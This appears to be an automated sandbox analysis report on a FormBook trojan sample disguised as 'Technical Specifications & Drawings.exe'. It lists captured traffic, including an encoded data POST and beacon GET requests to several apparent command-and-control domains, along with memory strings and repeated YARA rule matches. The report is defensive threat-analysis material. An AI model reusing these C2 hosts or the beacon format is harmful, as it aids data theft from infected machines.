          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 10:28:49 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 3
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 10:29:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 10:29:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: control.exe, 00000013.00000002.518695747.0000000004AB2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: control.exe, 00000013.00000002.517362036.000000000473B000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:200
          Source: unknownHTTP traffic detected: POST /02pi/ HTTP/1.1Host: www.mexc-event-partner.siteConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.mexc-event-partner.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mexc-event-partner.site/02pi/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 5a 4c 30 3d 44 76 79 6b 59 68 57 49 4d 35 4c 42 4a 6a 4d 50 6a 54 75 63 62 57 6d 55 44 47 6a 73 66 32 46 4f 72 53 64 48 57 70 34 47 61 33 74 68 66 6a 38 75 79 5f 54 78 59 47 53 44 75 33 62 4c 39 42 7a 62 39 47 57 70 74 79 46 63 62 75 70 69 6f 68 6f 32 6d 5a 51 56 77 5a 7e 45 62 35 42 51 71 64 43 78 66 72 6f 78 42 49 62 70 39 44 47 75 43 31 5a 30 69 52 7a 49 4d 53 7a 7a 32 78 43 77 6d 76 61 52 4e 31 7a 49 62 44 50 49 4d 5f 62 72 31 33 36 6b 6d 7a 39 35 4e 67 61 62 55 51 4a 31 6b 50 63 62 41 55 71 63 37 55 45 52 32 73 48 51 55 66 46 65 5a 46 4f 7a 35 4e 4e 35 7a 68 6b 4a 6b 50 6b 35 57 53 37 6a 28 47 52 42 41 71 49 7a 64 74 78 42 54 72 46 39 36 4c 77 2d 57 32 63 52 66 32 63 57 74 31 28 5f 4b 43 54 63 65 35 74 43 76 64 59 53 45 5f 6f 36 59 31 59 2d 41 79 45 43 4f 36 6e 73 66 6e 71 72 39 4d 35 34 6d 44 79 6f 39 47 71 66 4f 48 6c 58 37 74 41 41 7a 32 51 4a 71 51 41 63 33 52 49 4f 45 2d 42 64 71 4a 48 6c 69 37 6b 68 41 6c 45 4f 6d 68 6a 72 35 37 6b 71 6e 4e 55 6f 6e 4e 66 4f 51 70 48 43 58 79 67 71 66 58 67 68 77 34 71 52 56 47 6c 61 38 50 50 57 5a 63 4c 6c 7e 38 65 44 72 52 57 79 48 4a 59 70 30 53 4a 41 56 59 6c 76 6d 33 33 33 6c 6f 4f 2d 6b 6b 54 2d 63 69 57 52 79 36 54 35 7a 51 79 71 52 6f 44 4c 6d 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ZL0=DvykYhWIM5LBJjMPjTucbWmUDGjsf2FOrSdHWp4Ga3thfj8uy_TxYGSDu3bL9Bzb9GWptyFcbupioho2mZQVwZ~Eb5BQqdCxfroxBIbp9DGuC1Z0iRzIMSzz2xCwmvaRN1zIbDPIM_br136kmz95NgabUQJ1kPcbAUqc7UER2sHQUfFeZFOz5NN5zhkJkPk5WS7j(GRBAqIzdtxBTrF96Lw-W2cRf2cWt1(_KCTce5tCvdYSE_o6Y1Y-AyECO6nsfnqr9M54mDyo9GqfOHlX7tAAz2QJqQAc3RIOE-BdqJHli7khAlEOmhjr57kqnNUonNfOQpHCXygqfXghw4qRVGla8PPWZcLl~8eDrRWyHJYp0SJAVYlvm333loO-kkT-ciWRy6T5zQyqRoDLmA).
          Source: unknownDNS traffic detected: queries for: www.kirchhoff-darryl.com
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ HTTP/1.1Host: www.kirchhoff-darryl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ HTTP/1.1Host: www.tomoptique.frConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=4npjF3s9G6uWNp4ceBGqcNUcjkX96JEG8J4d3OAuWw45Kxpl9gSb2BHY5Eg4Nc6InaukRaYVJuT4y0aleUHPUlqgoOBFmRDZHQ==&wRtdp=ETVPg0_ HTTP/1.1Host: www.boshi-eg.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ HTTP/1.1Host: www.esandcraic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ HTTP/1.1Host: www.mexc-event-partner.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 6080, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 5084, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: control.exe PID: 1896, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Technical Specifications & Drawings.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
